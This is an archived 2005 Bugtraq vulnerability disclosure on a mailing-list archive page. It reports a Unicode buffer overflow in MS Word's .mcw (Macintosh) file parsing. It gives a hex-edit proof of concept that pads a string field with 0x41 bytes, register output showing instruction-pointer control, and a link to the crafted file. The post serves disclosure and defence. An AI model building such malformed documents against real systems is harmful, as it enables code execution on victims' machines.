| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 19 May 2005 23:33:34 -0000 From: Bahaa Naamneh <b_naamneh@...mail.com> To: bugtraq@...urityfocus.com Subject: UNICODE BUFFER OVERFLOW IN MS-WORD UNICODE BUFFER OVERFLOW IN MS-WORD =================================== *.mcw is the ms-word format file for Macintosh. the unicode buffer overflow occurs when the user opens the malformed *.mcw document. Proof of concept: ----------------- by modifying the *.mcw file by using binary editor as follows these lines were taken from .mcw file: ------snip---mcw-file---- c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77 ------snip--------------- change them as follows: c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68 61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 ------------ EAX = 00000000 EBX = 00000000 ECX = 00000006 EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0 EIP = 00410041 ESP = 00126110 EBP = 00410041 EFL = 00000246 ------------ * modified .mcw file can be downloaded from: http://study.haifa.ac.il/~bnaamnih/word/foo.mcw --------------------- Bahaa Naamnmeh b_naamneh@...mail.com www.bsecurity.tk
Powered by blists - more mailing lists